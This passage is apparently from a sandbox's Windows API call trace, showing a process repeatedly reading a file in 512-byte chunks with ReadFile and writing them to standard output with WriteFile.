lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] GetFileType (hFile=0x50) returned 0x1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] GetFileType (hFile=0x50) returned 0x1 [0142.862] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] GetFileType (hFile=0x50) returned 0x1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.863] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.863] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] GetFileType (hFile=0x50) returned 0x1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] GetFileType (hFile=0x50) returned 0x1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] GetFileType (hFile=0x50) returned 0x1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, 
lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] GetFileType (hFile=0x50) returned 0x1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] GetFileType (hFile=0x50) returned 0x1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] GetFileType (hFile=0x50) returned 0x1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] GetFileType (hFile=0x50) returned 0x1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] GetFileType (hFile=0x50) returned 0x1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, 
lpOverlapped=0x0) returned 1 [0142.864] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.864] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.864] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.864] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] GetFileType (hFile=0x50) returned 0x1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] GetFileType (hFile=0x50) returned 0x1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] GetFileType (hFile=0x50) returned 0x1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] GetFileType (hFile=0x50) returned 0x1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] GetFileType (hFile=0x50) returned 0x1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] WriteFile (in: hFile=0x50, 
lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] GetFileType (hFile=0x50) returned 0x1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] GetFileType (hFile=0x50) returned 0x1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] GetFileType (hFile=0x50) returned 0x1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.865] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.865] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.865] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.865] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] GetFileType (hFile=0x50) returned 0x1 [0142.865] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0142.865] GetFileType (hFile=0x50) returned 0x1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] GetFileType (hFile=0x50) returned 0x1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] GetFileType (hFile=0x50) returned 0x1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] GetFileType (hFile=0x50) returned 0x1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] GetFileType (hFile=0x50) returned 0x1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 
[0142.866] GetFileType (hFile=0x50) returned 0x1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] GetFileType (hFile=0x50) returned 0x1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.866] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.866] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.866] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.866] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] GetFileType (hFile=0x50) returned 0x1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] GetFileType (hFile=0x50) returned 0x1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] GetFileType (hFile=0x50) returned 0x1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, 
lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] GetFileType (hFile=0x50) returned 0x1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] GetFileType (hFile=0x50) returned 0x1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] GetFileType (hFile=0x50) returned 0x1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] GetFileType (hFile=0x50) returned 0x1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] GetFileType (hFile=0x50) returned 0x1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: 
lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.867] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.868] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.868] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.868] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] GetFileType (hFile=0x50) returned 0x1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] GetFileType (hFile=0x50) returned 0x1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] GetFileType (hFile=0x50) returned 0x1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] GetFileType (hFile=0x50) returned 0x1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] GetFileType (hFile=0x50) returned 0x1 [0142.868] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0142.868] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] GetFileType (hFile=0x50) returned 0x1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] GetFileType (hFile=0x50) returned 0x1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] GetFileType (hFile=0x50) returned 0x1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.869] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.869] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.869] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.869] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] 
GetFileType (hFile=0x50) returned 0x1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] GetFileType (hFile=0x50) returned 0x1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] GetFileType (hFile=0x50) returned 0x1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] GetFileType (hFile=0x50) returned 0x1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] GetFileType (hFile=0x50) returned 0x1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] GetFileType (hFile=0x50) returned 0x1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 
[0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] GetFileType (hFile=0x50) returned 0x1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] GetFileType (hFile=0x50) returned 0x1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.870] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.870] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.870] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.870] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] GetFileType (hFile=0x50) returned 0x1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] GetFileType (hFile=0x50) returned 0x1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] GetFileType (hFile=0x50) returned 0x1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] GetFileType (hFile=0x50) returned 0x1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] GetFileType (hFile=0x50) returned 0x1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] GetFileType (hFile=0x50) returned 0x1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] GetFileType (hFile=0x50) returned 0x1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] GetFileType (hFile=0x50) returned 0x1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, 
